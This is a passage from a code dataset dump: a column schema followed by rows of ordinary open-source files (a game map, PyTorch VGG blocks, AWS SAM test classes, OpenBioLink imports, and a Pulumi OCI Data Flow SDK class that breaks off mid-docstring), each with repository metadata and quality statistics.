| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
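Once a shard of this split is downloaded, the schema can be inspected directly. Below is a minimal sketch using pandas, assuming the data is stored as Parquet; the file name is a placeholder, and the two recomputed statistics use straightforward definitions that may differ from the ones used to produce the stored columns.

```python
import pandas as pd

# Placeholder shard name; substitute the actual Parquet file for this split.
df = pd.read_parquet("shard-00000.parquet")

# Sanity-check the shape and a few metadata columns against the schema above.
print(df.shape)  # (num_rows, 113)
print(df[["max_stars_repo_name", "max_stars_repo_path", "lang", "size"]].head())

# Re-derive two simple statistics from `content` and compare them with the
# stored columns (assumed definitions, for illustration only).
lines = df["content"].str.split("\n")
df["avg_line_length_check"] = lines.map(lambda ls: sum(len(l) for l in ls) / len(ls))
df["alphanum_fraction_check"] = df["content"].map(
    lambda s: sum(c.isalnum() for c in s) / max(len(s), 1)
)
print(df[["avg_line_length", "avg_line_length_check",
          "alphanum_fraction", "alphanum_fraction_check"]].head())
```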
Row 1:

| Field | Value |
|---|---|
| hexsha | 2491a71fc803b278270e6545e0aa997ad42cff7b |
| size | 1081 |
| ext | py |
| lang | Python |
| max_stars_repo_path | rgkit/maps/afffsdd/fourcorners.py |
| max_stars_repo_name | outkine/rgkit |
| max_stars_repo_head_hexsha | eb5d80c0d1815cc016bf7c584310120991760cc8 |
| max_stars_repo_licenses | ["Unlicense"] |
| max_stars_count | 1 |
| max_stars_repo_stars_event_min_datetime | 2021-11-04T22:19:59.000Z |
| max_stars_repo_stars_event_max_datetime | 2021-11-04T22:19:59.000Z |
| max_issues_repo_path | rgkit/maps/afffsdd/fourcorners.py |
| max_issues_repo_name | outkine/rgkit |
| max_issues_repo_head_hexsha | eb5d80c0d1815cc016bf7c584310120991760cc8 |
| max_issues_repo_licenses | ["Unlicense"] |
| max_issues_count | null |
| max_issues_repo_issues_event_min_datetime | null |
| max_issues_repo_issues_event_max_datetime | null |
| max_forks_repo_path | rgkit/maps/afffsdd/fourcorners.py |
| max_forks_repo_name | outkine/rgkit |
| max_forks_repo_head_hexsha | eb5d80c0d1815cc016bf7c584310120991760cc8 |
| max_forks_repo_licenses | ["Unlicense"] |
| max_forks_count | 2 |
| max_forks_repo_forks_event_min_datetime | 2021-02-16T09:37:47.000Z |
| max_forks_repo_forks_event_max_datetime | 2021-11-04T22:30:51.000Z |
| avg_line_length | 180.166667 |
| max_line_length | 959 |
| alphanum_fraction | 0.379278 |
| effective | 0 |
| hits | 7 |

content:

```python
# Map by afffsdd
# A map with four corners, with bots spawning in each of them.
# flake8: noqa
# TODO: Format this file.
{'spawn': [(1, 1), (14, 1), (15, 1), (16, 1), (17, 1), (1, 2), (1, 3), (1, 4), (17, 14), (17, 15), (17, 16), (1, 17), (2, 17), (3, 17), (4, 17), (17, 17)], 'obstacle': [(0, 0), (1, 0), (2, 0), (3, 0), (4, 0), (5, 0), (6, 0), (7, 0), (8, 0), (9, 0), (10, 0), (11, 0), (12, 0), (13, 0), (14, 0), (15, 0), (16, 0), (17, 0), (18, 0), (0, 1), (13, 1), (18, 1), (0, 2), (13, 2), (18, 2), (0, 3), (13, 3), (18, 3), (0, 4), (13, 4), (18, 4), (0, 5), (1, 5), (2, 5), (3, 5), (4, 5), (18, 5), (0, 6), (18, 6), (0, 7), (18, 7), (0, 8), (18, 8), (0, 9), (18, 9), (0, 10), (18, 10), (0, 11), (18, 11), (0, 12), (18, 12), (0, 13), (14, 13), (15, 13), (16, 13), (17, 13), (18, 13), (0, 14), (5, 14), (18, 14), (0, 15), (5, 15), (18, 15), (0, 16), (5, 16), (18, 16), (0, 17), (5, 17), (18, 17), (0, 18), (1, 18), (2, 18), (3, 18), (4, 18), (5, 18), (6, 18), (7, 18), (8, 18), (9, 18), (10, 18), (11, 18), (12, 18), (13, 18), (14, 18), (15, 18), (16, 18), (17, 18), (18, 18)]}
```

`qsc_*_quality_signal` values (41 columns, in schema order): 231, 1081, 1.774892, 0.17316, 0.009756, 0.02439, 0, 0, 0, 0, 0, 0, 0, 0, 0.367612, 0.217391, 1081, 5, 960, 216.2, 0.117021, 0.103608, 0, 0, 0, 0, 0.013485, 0, 0, 0, 0, 0.2, 0, 1, 0, true, 0, 0, 0, 0, 0

`qsc_*` raw values (41 columns, in schema order): 0, 0, 1, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0
Row 2:

| Field | Value |
|---|---|
| hexsha | 24a2fcbef82d9b606c9644dcb37319a8bd660a8d |
| size | 51 |
| ext | py |
| lang | Python |
| max_stars_repo_path | recommender-system/helpers/Time.py |
| max_stars_repo_name | sevmardi/ml-projects |
| max_stars_repo_head_hexsha | 0eb218c77cda61285cfcf599599ff28a8a8deba7 |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | null |
| max_stars_repo_stars_event_min_datetime | null |
| max_stars_repo_stars_event_max_datetime | null |
| max_issues_repo_path | recommender-system/helpers/Time.py |
| max_issues_repo_name | sevmardi/ml-projects |
| max_issues_repo_head_hexsha | 0eb218c77cda61285cfcf599599ff28a8a8deba7 |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | 7 |
| max_issues_repo_issues_event_min_datetime | 2020-06-06T01:26:08.000Z |
| max_issues_repo_issues_event_max_datetime | 2022-02-10T11:26:58.000Z |
| max_forks_repo_path | recommender-system/helpers/Time.py |
| max_forks_repo_name | sevmardi/ml-projects |
| max_forks_repo_head_hexsha | 0eb218c77cda61285cfcf599599ff28a8a8deba7 |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | null |
| max_forks_repo_forks_event_min_datetime | null |
| max_forks_repo_forks_event_max_datetime | null |
| avg_line_length | 7.285714 |
| max_line_length | 22 |
| alphanum_fraction | 0.627451 |
| effective | 0 |
| hits | 7 |

content:

```python
import time


def start():
    return time.time()
```

`qsc_*_quality_signal` values (41 columns, in schema order): 7, 51, 4.571429, 0.714286, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.254902, 51, 6, 23, 8.5, 0.842105, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0.333333, true, 0, 0.333333, 0.333333, 1, 0

`qsc_*` raw values (41 columns, in schema order): 1, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0
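The quality-signal columns are per-file statistics of the kind sketched below, here computed for an arbitrary `content` string. The exact definitions behind the stored values are not spelled out in this listing, so the formulas in this sketch are assumptions for illustration only.

```python
def simple_signals(content: str) -> dict:
    """Rough analogues of a few qsc_code_* columns (assumed definitions)."""
    lines = content.split("\n")
    words = content.split()
    n_chars = len(content)
    return {
        "qsc_code_num_lines": len(lines),
        "qsc_code_num_words": len(words),
        "qsc_code_num_chars": n_chars,
        "qsc_code_mean_word_length": sum(map(len, words)) / len(words) if words else 0.0,
        "qsc_code_frac_words_unique": len(set(words)) / len(words) if words else 0.0,
        "qsc_code_frac_chars_whitespace": sum(c.isspace() for c in content) / n_chars if n_chars else 0.0,
        "qsc_code_frac_lines_import": sum(
            l.lstrip().startswith(("import ", "from ")) for l in lines
        ) / len(lines),
    }


# Example: the Time.py snippet from the row above.
print(simple_signals("import time\n\n\ndef start():\n    return time.time()\n"))
```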
Row 3:

| Field | Value |
|---|---|
| hexsha | 24b1b484e2a0f69ead351a4d7c8ddaa49aeb42ed |
| size | 612 |
| ext | py |
| lang | Python |
| max_stars_repo_path | src/openbiolink/graph_creation/file_processor/onto/__init__.py |
| max_stars_repo_name | jerryhluo/OpenBioLink |
| max_stars_repo_head_hexsha | 6fc073af978daec0b0db5938b73beed37f57f495 |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | 97 |
| max_stars_repo_stars_event_min_datetime | 2019-11-26T09:53:18.000Z |
| max_stars_repo_stars_event_max_datetime | 2022-03-19T10:33:10.000Z |
| max_issues_repo_path | src/openbiolink/graph_creation/file_processor/onto/__init__.py |
| max_issues_repo_name | jerryhluo/OpenBioLink |
| max_issues_repo_head_hexsha | 6fc073af978daec0b0db5938b73beed37f57f495 |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | 67 |
| max_issues_repo_issues_event_min_datetime | 2019-12-09T21:01:52.000Z |
| max_issues_repo_issues_event_max_datetime | 2021-12-21T15:19:41.000Z |
| max_forks_repo_path | src/openbiolink/graph_creation/file_processor/onto/__init__.py |
| max_forks_repo_name | jerryhluo/OpenBioLink |
| max_forks_repo_head_hexsha | 6fc073af978daec0b0db5938b73beed37f57f495 |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | 20 |
| max_forks_repo_forks_event_min_datetime | 2020-01-13T23:02:25.000Z |
| max_forks_repo_forks_event_max_datetime | 2022-03-16T21:43:31.000Z |
| avg_line_length | 87.428571 |
| max_line_length | 110 |
| alphanum_fraction | 0.921569 |
| effective | 0 |
| hits | 7 |

content:

```python
from openbiolink.graph_creation.file_processor.onto.ontoDoIsAProcessor import OntoDoIsAProcessor
from openbiolink.graph_creation.file_processor.onto.ontoGoIsAProcessor import OntoGoIsAProcessor
from openbiolink.graph_creation.file_processor.onto.ontoGoPartOfProcessor import OntoGoPartOfProcessor
from openbiolink.graph_creation.file_processor.onto.ontoHpoIsAProcessor import OntoHpoIsAProcessor
from openbiolink.graph_creation.file_processor.onto.ontoUberonIsAProcessor import OntoUberonIsAProcessor
from openbiolink.graph_creation.file_processor.onto.ontoUberonPartOfProcessor import OntoUberonPartOfProcessor
```

`qsc_*_quality_signal` values (41 columns, in schema order): 60, 612, 9.2, 0.233333, 0.163043, 0.217391, 0.304348, 0.48913, 0.48913, 0.48913, 0, 0, 0, 0, 0, 0.039216, 612, 6, 111, 102, 0.938776, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, true, 0, 1, 0, 1, 0

`qsc_*` raw values (41 columns, in schema order): 0, 0, 0, null, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0
Row 4:

| Field | Value |
|---|---|
| hexsha | 24bc4bd3f3ec771dc7f9bd9eefcdca177516a3ea |
| size | 1679 |
| ext | py |
| lang | Python |
| max_stars_repo_path | models/VGG/vgg_funcs.py |
| max_stars_repo_name | abhijeetdhupia/ImgClassSeg |
| max_stars_repo_head_hexsha | e841b36d170e4989d36146d4fc3deb1fe6fc7b36 |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | null |
| max_stars_repo_stars_event_min_datetime | null |
| max_stars_repo_stars_event_max_datetime | null |
| max_issues_repo_path | models/VGG/vgg_funcs.py |
| max_issues_repo_name | abhijeetdhupia/ImgClassSeg |
| max_issues_repo_head_hexsha | e841b36d170e4989d36146d4fc3deb1fe6fc7b36 |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | null |
| max_issues_repo_issues_event_min_datetime | null |
| max_issues_repo_issues_event_max_datetime | null |
| max_forks_repo_path | models/VGG/vgg_funcs.py |
| max_forks_repo_name | abhijeetdhupia/ImgClassSeg |
| max_forks_repo_head_hexsha | e841b36d170e4989d36146d4fc3deb1fe6fc7b36 |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | null |
| max_forks_repo_forks_event_min_datetime | null |
| max_forks_repo_forks_event_max_datetime | null |
| avg_line_length | 39.97619 |
| max_line_length | 112 |
| alphanum_fraction | 0.650983 |
| effective | 0 |
| hits | 7 |

content:

```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.modules.activation import ReLU
import torch.optim as optim


class DoubleConv(nn.Module):
    """Some Information about MyModule"""
    def __init__(self, in_channels, out_channels):
        super(DoubleConv, self).__init__()
        self.convblock2 = nn.Sequential(
            nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),
            nn.BatchNorm2d(out_channels),
            nn.ReLU(),
            nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),
            nn.BatchNorm2d(out_channels),
            nn.ReLU(),
            nn.MaxPool2d(kernel_size=2, stride=2)
        )

    def forward(self, x):
        return self.convblock2(x)


class ThreeConv(nn.Module):
    """Some Information about ThreeConv"""
    def __init__(self, in_channels, out_channels):
        super(ThreeConv, self).__init__()
        self.convblock3 = nn.Sequential(
            nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),
            nn.BatchNorm2d(out_channels),
            nn.ReLU(),
            nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),
            nn.BatchNorm2d(out_channels),
            nn.ReLU(),
            nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),
            nn.BatchNorm2d(out_channels),
            nn.ReLU(),
            nn.MaxPool2d(kernel_size=2, stride=2)
        )

    def forward(self, x):
        return self.convblock3(x)
```

`qsc_*_quality_signal` values (41 columns, in schema order): 216, 1679, 4.819444, 0.194444, 0.211335, 0.273775, 0.169068, 0.763689, 0.709894, 0.709894, 0.709894, 0.638809, 0.638809, 0, 0.02728, 0.235855, 1679, 42, 113, 39.97619, 0.7841, 0.038118, 0, 0.583333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0.111111, false, 0, 0.138889, 0.055556, 0.361111, 0

`qsc_*` raw values (41 columns, in schema order): 0, 0, 0, null, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
Row 5:

| Field | Value |
|---|---|
| hexsha | 24ff43902d9ee3947a0b840767671eaf3c6068c6 |
| size | 2345 |
| ext | py |
| lang | Python |
| max_stars_repo_path | tests/integration/unit_test/test_unit_test_java8_al2.py |
| max_stars_repo_name | hawflau/aws-sam-cli-app-templates |
| max_stars_repo_head_hexsha | 47e7100659c1cdf8c1ae1d8eba36de5dbd01623c |
| max_stars_repo_licenses | ["Apache-2.0"] |
| max_stars_count | 173 |
| max_stars_repo_stars_event_min_datetime | 2020-08-25T14:07:05.000Z |
| max_stars_repo_stars_event_max_datetime | 2022-03-30T06:06:50.000Z |
| max_issues_repo_path | tests/integration/unit_test/test_unit_test_java8_al2.py |
| max_issues_repo_name | hawflau/aws-sam-cli-app-templates |
| max_issues_repo_head_hexsha | 47e7100659c1cdf8c1ae1d8eba36de5dbd01623c |
| max_issues_repo_licenses | ["Apache-2.0"] |
| max_issues_count | 98 |
| max_issues_repo_issues_event_min_datetime | 2020-09-08T00:18:55.000Z |
| max_issues_repo_issues_event_max_datetime | 2022-03-21T06:49:48.000Z |
| max_forks_repo_path | tests/integration/unit_test/test_unit_test_java8_al2.py |
| max_forks_repo_name | hawflau/aws-sam-cli-app-templates |
| max_forks_repo_head_hexsha | 47e7100659c1cdf8c1ae1d8eba36de5dbd01623c |
| max_forks_repo_licenses | ["Apache-2.0"] |
| max_forks_count | 109 |
| max_forks_repo_forks_event_min_datetime | 2020-09-02T17:34:10.000Z |
| max_forks_repo_forks_event_max_datetime | 2022-03-28T03:47:38.000Z |
| avg_line_length | 43.425926 |
| max_line_length | 118 |
| alphanum_fraction | 0.81322 |
| effective | 0 |
| hits | 8 |

content:

```python
from unittest import skip

from tests.integration.unit_test.unit_test_base import UnitTestBase


class UnitTest_java8_al2_cookiecutter_aws_sam_hello_java_gradle(UnitTestBase.JavaUnitTestGradleBase):
    directory = "java8.al2/cookiecutter-aws-sam-hello-java-gradle"
    code_directories = ["HelloWorldFunction"]


class UnitTest_java8_al2_cookiecutter_aws_sam_hello_java_maven(UnitTestBase.JavaUnitTestMavenBase):
    directory = "java8.al2/cookiecutter-aws-sam-hello-java-maven"
    code_directories = ["HelloWorldFunction"]


class UnitTest_java8_al2_cookiecutter_aws_sam_eventbridge_hello_java_gradle(UnitTestBase.JavaUnitTestGradleBase):
    directory = "java8.al2/cookiecutter-aws-sam-eventbridge-hello-java-gradle"
    code_directories = ["HelloWorldFunction"]


class UnitTest_java8_al2_cookiecutter_aws_sam_eventbridge_hello_java_maven(UnitTestBase.JavaUnitTestMavenBase):
    directory = "java8.al2/cookiecutter-aws-sam-eventbridge-hello-java-maven"
    code_directories = ["HelloWorldFunction"]


@skip("eventbridge schema app requires credential to pull missing files, skip")
class UnitTest_java8_al2_cookiecutter_aws_sam_eventbridge_schema_app_java_gradle(UnitTestBase.JavaUnitTestGradleBase):
    directory = "java8.al2/cookiecutter-aws-sam-eventbridge-schema-app-java-gradle"
    code_directories = ["HelloWorldFunction"]


@skip("eventbridge schema app requires credential to pull missing files, skip")
class UnitTest_java8_al2_cookiecutter_aws_sam_eventbridge_schema_app_java_maven(UnitTestBase.JavaUnitTestMavenBase):
    directory = "java8.al2/cookiecutter-aws-sam-eventbridge-schema-app-java-maven"
    code_directories = ["HelloWorldFunction"]


class UnitTest_java8_al2_cookiecutter_aws_sam_step_functions_sample_app_gradle(UnitTestBase.JavaUnitTestGradleBase):
    directory = "java8.al2/cookiecutter-aws-sam-hello-java-step-functions-sample-app-gradle"
    code_directories = [
        "functions/StockBuyer",
        "functions/StockChecker",
        "functions/StockSeller",
    ]


class UnitTest_java8_al2_cookiecutter_aws_sam_step_functions_sample_app_maven(UnitTestBase.JavaUnitTestMavenBase):
    directory = "java8.al2/cookiecutter-aws-sam-hello-java-step-functions-sample-app-maven"
    code_directories = [
        "functions/StockBuyer",
        "functions/StockChecker",
        "functions/StockSeller",
    ]
```

`qsc_*_quality_signal` values (41 columns, in schema order): 262, 2345, 6.954198, 0.156489, 0.070252, 0.175631, 0.201976, 0.956092, 0.950055, 0.950055, 0.950055, 0.867728, 0.838639, 0, 0.01518, 0.101066, 2345, 53, 119, 44.245283, 0.849146, 0, 0, 0.444444, 0, 0.055556, 0.368444, 0.245629, 0, 0, 0, 0, 0, 1, 0, false, 0, 0.055556, 0, 0.722222, 0

`qsc_*` raw values (41 columns, in schema order): 0, 0, 0, null, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0
Row 6:

| Field | Value |
|---|---|
| hexsha | 7025f73ad80c8076e262f4fb828675dfe810962c |
| size | 96140 |
| ext | py |
| lang | Python |
| max_stars_repo_path | sdk/python/pulumi_oci/dataflow/invoke_run.py |
| max_stars_repo_name | EladGabay/pulumi-oci |
| max_stars_repo_head_hexsha | 6841e27d4a1a7e15c672306b769912efbfd3ba99 |
| max_stars_repo_licenses | ["ECL-2.0", "Apache-2.0"] |
| max_stars_count | 5 |
| max_stars_repo_stars_event_min_datetime | 2021-08-17T11:14:46.000Z |
| max_stars_repo_stars_event_max_datetime | 2021-12-31T02:07:03.000Z |
| max_issues_repo_path | sdk/python/pulumi_oci/dataflow/invoke_run.py |
| max_issues_repo_name | pulumi-oci/pulumi-oci |
| max_issues_repo_head_hexsha | 6841e27d4a1a7e15c672306b769912efbfd3ba99 |
| max_issues_repo_licenses | ["ECL-2.0", "Apache-2.0"] |
| max_issues_count | 1 |
| max_issues_repo_issues_event_min_datetime | 2021-09-06T11:21:29.000Z |
| max_issues_repo_issues_event_max_datetime | 2021-09-06T11:21:29.000Z |
| max_forks_repo_path | sdk/python/pulumi_oci/dataflow/invoke_run.py |
| max_forks_repo_name | pulumi-oci/pulumi-oci |
| max_forks_repo_head_hexsha | 6841e27d4a1a7e15c672306b769912efbfd3ba99 |
| max_forks_repo_licenses | ["ECL-2.0", "Apache-2.0"] |
| max_forks_count | 2 |
| max_forks_repo_forks_event_min_datetime | 2021-08-24T23:31:30.000Z |
| max_forks_repo_forks_event_max_datetime | 2022-01-02T19:26:54.000Z |

content:
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['InvokeRunArgs', 'InvokeRun']
@pulumi.input_type
class InvokeRunArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
application_id: Optional[pulumi.Input[str]] = None,
archive_uri: Optional[pulumi.Input[str]] = None,
arguments: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
asynchronous: Optional[pulumi.Input[bool]] = None,
configuration: Optional[pulumi.Input[Mapping[str, Any]]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
driver_shape: Optional[pulumi.Input[str]] = None,
execute: Optional[pulumi.Input[str]] = None,
executor_shape: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
logs_bucket_uri: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
num_executors: Optional[pulumi.Input[int]] = None,
parameters: Optional[pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]]] = None,
spark_version: Optional[pulumi.Input[str]] = None,
warehouse_bucket_uri: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a InvokeRun resource.
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of a compartment.
:param pulumi.Input[str] application_id: The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
:param pulumi.Input[str] archive_uri: An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[Sequence[pulumi.Input[str]]] arguments: The arguments passed to the running application as command line arguments. An argument is either a plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map else the request (POST or PUT) will fail with a HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
:param pulumi.Input[Mapping[str, Any]] configuration: The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[str] display_name: A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by API using fileUri's application file name.
:param pulumi.Input[str] driver_shape: The VM shape for the driver. Sets the driver cores and memory.
:param pulumi.Input[str] execute: The input used for spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, parameters during application create/update, or run create/submit, Data Flow service will use derived information from execute input only.
:param pulumi.Input[str] executor_shape: The VM shape for the executors. Sets the executor cores and memory.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] logs_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[str] metastore_id: The OCID of Oracle Cloud Infrastructure Hive Metastore.
:param pulumi.Input[int] num_executors: The number of executor VMs requested.
